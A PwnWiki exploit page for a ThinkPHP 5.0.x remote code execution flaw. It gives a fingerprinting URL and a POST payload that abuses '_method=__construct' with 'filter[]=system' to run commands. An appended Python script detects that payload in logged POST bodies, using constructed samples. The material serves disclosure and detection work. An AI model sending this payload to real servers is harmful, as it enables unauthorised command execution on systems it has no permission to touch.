ThinkPHP 5.0.13 Code Execution Vulnerability

From PwnWiki
Revision as of 14:07, 3 July 2021 by Xc1ym

Affected versions

ThinkPHP <= v5.0.19

Exploitation

Determine the ThinkPHP version from the error page

http://127.0.0.1/tk5/public/index.php/111

Payload

http://127.0.0.1/tk5/public/index.php

Send the following data via POST

s=whoami&_method=__construct&method=&filter[]=system
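
Detection

The following is an added example, not part of the original page or of ThinkPHP: a log check that flags POST bodies where `_method` carries something other than an HTTP verb, as in the payload above, and reports when `filter` or `method` is sent with it. The record layout (source, verb, path, body) and the sample records are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl

# Verbs a form may legitimately request through the _method override field.
ALLOWED_OVERRIDES = {"GET", "POST", "PUT", "PATCH", "DELETE"}
# Body keys that, in the payload above, accompany the override.
COMPANION_KEYS = {"filter", "method"}


def base_key(name):
    """Strip PHP array syntax: 'filter[]' and 'filter[0]' become 'filter'."""
    return name.split("[", 1)[0].strip().lower()


def inspect_body(body):
    """Return findings for one application/x-www-form-urlencoded POST body."""
    pairs = parse_qsl(body, keep_blank_values=True)  # also percent-decodes
    overrides = [v for k, v in pairs if base_key(k) == "_method"]
    bad = [v for v in overrides if v.strip().upper() not in ALLOWED_OVERRIDES]
    if not bad:
        return []
    findings = [f"_method set to non-verb value {v!r}" for v in bad]
    companions = sorted({base_key(k) for k, _ in pairs} & COMPANION_KEYS)
    if companions:
        findings.append("sent together with: " + ", ".join(companions))
    return findings


def scan(records):
    """Return (source, path, findings) for each suspicious POST record."""
    hits = []
    for src, verb, path, body in records:
        if verb.upper() != "POST":
            continue
        findings = inspect_body(body)
        if findings:
            hits.append((src, path, findings))
    return hits


# Constructed sample records (source, verb, path, body); not real traffic.
SAMPLE = [
    ("198.51.100.7", "POST", "/tk5/public/index.php",
     "s=whoami&_method=__construct&method=&filter[]=system"),
    ("198.51.100.7", "POST", "/tk5/public/index.php",
     "s=whoami&_method=__construct&method=&filter%5B%5D=system"),
    ("203.0.113.20", "POST", "/tk5/public/index.php/user/5", "_method=PUT&name=alice"),
    ("203.0.113.21", "POST", "/tk5/public/index.php/search", "filter=price&q=shoes"),
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

The second sample is the same body with the brackets percent-encoded, which is how most clients send it; both forms are flagged, while the legitimate `_method=PUT` form and the plain `filter=price` search are not.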